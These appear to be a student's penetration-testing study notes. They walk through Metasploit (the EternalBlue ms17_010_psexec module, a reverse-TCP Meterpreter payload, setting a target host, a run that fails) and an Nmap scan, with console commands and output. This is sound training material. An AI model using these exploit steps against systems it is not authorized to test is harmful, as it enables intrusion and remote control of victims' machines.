Performing a Basic PenTest
(OBJ 5.5)
Metasploit
- Multipurpose computer security and penetration testing framework
- Encompasses a wide array of powerful tools, enabling the execution of penetration tests
- Has a wide array of powerful tools for conducting penetration tests
- Included by default on KaliLinux
- Allows to start multiple command prompt session and send sessions to the background
Starting Point
Example using msfconsole command:
┌──(macc㉿kaliLab)-[~]
└─$ msfconsole
Output:
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v6.4.64-dev ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post ]
+ -- --=[ 1607 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
- Every time you load it, you will get a different splash screen
- At the bottom it tells you how many exploits, auxiliaries, posts, payload, encoders, nops, and evasion there are
- Exploits
- 2519 exploits
- Simply some piece of code or software that can deliver a payload and do some sort of an attack on a given target.
- Auxiliary
- Includes scanners, sniffers, fuzzers, spoofers, and other non-exploit features of this tool.
- Post
- Any additional task that you may need to perform on a compromised host
- Stands for post-explitation
- Payloads
- Are what exploits are gonna deliver and then run
- When you run them it gives you control over the machine, or elevated permissions, etc.
- Encoders
- Ensure payloads make it to the destination in one piece and undetected.
- You may encode things or decrypt things to bypass different intrusion detection systems, firewalls, router ACLs
- Nops
- A non-operation
- Used to keep the payload sizes consistent across all the different exploit attempts.
- Also useful as part of your evasion
- Evasion
- Ways to try to get by or get through some sort of defenses that somebody has set up against you.
- Exploits
Searching for vulnerabilities
- Example: You know that port 6667 is open for IRC using the UnrealIRC daemon, is a vulnerable version.
Example using search command:
semsf6 > search irc
Output:
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/credentials/adi_irc . normal No Adi IRC Credential Gatherer
1 exploit/multi/local/allwinner_backdoor 2016-04-30 excellent Yes Allwinner 3.4 Legacy Kernel Local Privilege Escalation
2 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
3 \_ target: Automatic . . . .
4 \_ target: Windows . . . .
5 \_ target: Linux . . . .
6 exploit/linux/local/docker_cgroup_escape 2022-02-04 excellent Yes Docker cgroups Container Escape
7 \_ target: BINARY . . . .
8 \_ target: CMD . . . .
9 exploit/windows/emc/replication_manager_exec 2011-02-07 great No EMC Replication Manager Command Execution
10 post/windows/gather/credentials/halloy_irc . normal No Halloy IRC Credential Gatherer
...
- Searching for that vulnerability to see if there is any associated with it
- All things that have 'irc' will show up
- Looking at the path of each item you will know the OS and where the backdoor is basically located.
- Now you can just use
use 8or any number to select the exploit you want to use.
EternalBlue example
Selecting Exploit
Example using use command:
msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) >
exploit/windows/smb/ms17_010_psexecis an exploit that targets Windows systems over SMB using the Microsoft patch 010 in the year 2017. (This is the patch associated with EternalBlue)- Now the prompt shows what exploit you are going to be using
Viewing options
Example using options command:
msf6 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak tran
saction
NAMEDPIPE no A named pipe that can be connected
to (leave blank for auto)
NAMED_PIPES /usr/share/metasploi yes List of named pipes to check
t-framework/data/wor
dlists/named_pipes.t
xt
RHOSTS yes The target host(s), see https://do
cs.metasploit.com/docs/using-metas
ploit/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on
target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an
admin share (ADMIN$,C$,...) or a
normal read/write folder share
SMBDomain . no The Windows domain to use for auth
entication
SMBPass no The password for the specified use
rname
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 192.168.64.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
- Different things you will use based on this exploit
- By using
optionsyou will see what options need to be made - RHOST is the target host you want to go after.
Setting RHOST
Example using set rhosts command:
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.2
rhosts => 192.168.1.2
- You will now see the RHOST listed in the
optionsmenu - RHOST = Remote host, or the IP you want to target
- RPORT = Remote port you want to target
- LHOST = Local host (your machine IP)
- LPORT = Local port
- The payload options is what are we going to do once we run that exploit.
- You have to run some kind of code afterwards, in this case we are setting up a reverse TCP shell using the Meterpreter shell inside of Metasploit
- Will allow to have a connection to that machine for more data gathering and so on.
Show and select payloads
Example using show command:
msf6 exploit(windows/smb/ms17_010_psexec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom . normal No Custom Payload
1 payload/generic/debug_trap . normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/generic/tight_loop . normal No Generic x86 Tight Loop
7 payload/windows/custom/bind_hidden_ipknock_tcp . normal No Windows shellcode stage, Hidden Bind Ipknock TCP Stager
8 payload/windows/custom/bind_hidden_tcp . normal No Windows shellcode stage, Hidden Bind TCP Stager
9 payload/windows/custom/bind_ipv6_tcp . normal No Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
10 payload/windows/custom/bind_ipv6_tcp_uuid . normal No Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
...
- Will show us all the compatible payloads that are known to work with this particular exploit.
Example using set payload command:
msf6 exploit(windows/smb/ms17_010_psexec) > set payload 8
payload => windows/custom/bind_hidden_tcp
- Or you can type the whole path of the payload
Run
Example using run command:
msf6 exploit(windows/smb/ms17_010_psexec) > run
- In this case I do not have a vulnerable host so it will fail
Output:
[*] Started reverse TCP handler on 192.168.64.2:4444
[-] 192.168.1.2:445 - Rex::ConnectionTimeout: The connection with (192.168.1.2:445) timed out.
[*] Exploit completed, but no session was created.
Using Nmap for Reconnaissance
Example using nmap command:
┌──(macc㉿kaliLab)-[~]
└─$ nmap 192.168.101.186
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 20:01 MDT
Nmap scan report for 192.168.101.186
Host is up (0.013s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
- When the actual IP address is known you can just type it and will see all opened ports
- If you do not know the exact IP address you can include a
/24to as innmap 192.168.101.186/24in order to scan the entire /24 subnet and see all hosts. This will help you identify the host you are looking for
More examples using nmap can be found on Fawn, Meow, or Dancing (HackTheBox machines)